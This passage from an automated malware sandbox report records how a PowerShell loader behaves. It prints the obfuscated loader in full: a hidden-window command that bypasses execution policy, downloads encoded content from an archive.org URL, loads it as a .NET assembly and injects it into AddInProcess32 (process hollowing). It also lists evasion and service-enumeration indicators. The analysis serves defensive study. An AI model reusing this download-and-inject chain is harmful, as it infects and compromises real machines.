0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAAC539F69 push ebx; iretd 5_2_00007FFAAC539F6A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00457186 push ecx; ret 7_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0045E55D push esi; ret 7_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00457AA8 push eax; ret 7_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434EB6 push ecx; ret 7_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00406EEB ShellExecuteW,URLDownloadToFileW,7_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040F7E2 Sleep,ExitProcess,7_2_0040F7E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAAC5395C9 sldt word ptr fs:[eax]5_2_00007FFAAC5395C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1592Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2264Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5129Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4616Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 4882Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 4600Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1754Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928Thread sleep count: 5129 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep count: 4616 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 744Thread sleep count: 185 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 744Thread sleep time: -92500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 576Thread sleep count: 4882 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 576Thread sleep time: -14646000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 576Thread sleep count: 4600 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 576Thread sleep time: -13800000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_004096A0
